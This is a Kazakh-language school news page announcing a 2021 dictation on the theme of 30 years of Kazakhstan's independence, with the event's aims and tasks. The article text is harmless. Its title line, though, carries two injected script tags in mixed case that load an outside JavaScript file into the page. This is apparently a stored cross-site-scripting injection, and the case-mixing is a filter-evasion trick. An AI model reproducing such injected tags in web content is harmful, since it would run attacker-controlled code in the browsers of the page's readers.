«Қазақстан Республикасының Тәуелсіздігіне – 30 жыл» тақырыбындағы диктант жазу басталды.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

29.11.2021

Қазақстан Республикасы Білім  және ғылым министрлігі, Тіл саясаты комитетінің ұйымдастыруымен  жалпы білім беретін мектептердің 2-11-сыныптарының (оқыту қазақ, орыс, өзбек, ұйғыр және тәжік тілдерінде) білім алушыларына арналған «Қазақстан Республикасының Тәуелсіздігіне – 30 жыл» тақырыбында  диктант жазу ұйымдастырылып, басталды. 

Мақсаты – Қазақстан Республикасы Тәуелсіздігінің 30 жылдығына орай білім алушылардың мемлекеттік тілде жазу мәдениетін дамыту, сауаттылығын қалыптастыру, мәтін мазмұны арқылы ұлттық құндылықтарды білім алушылардың бойына сіңіре отырып, патриоттық тәрбие беру.

Міндеттері:

  • білім алушылардың мемлекеттік тілді білуі мен сауаттылық деңгейін байқау және тілге деген құрметін арттыру;
  • білім      алушылардың         мемлекеттік        тілде      сауатты       жазу      дағдысын қалыптастыру;
  • мемлекеттік тілдің мәртебесін арттыру және білім алушылардың бойына ұлттық құндылықтарды сіңіру;
  • білім алушылардың еліне, жеріне, отанына деген сүйіспеншілігі мен мақтанышын ояту.

Диктантты қазақ тілі мен әдебиеті пәнінің мұғалімдері өткізуде. 

Просмотров: 363


Пікір қосу



Деректерді қолтаңбаға қосу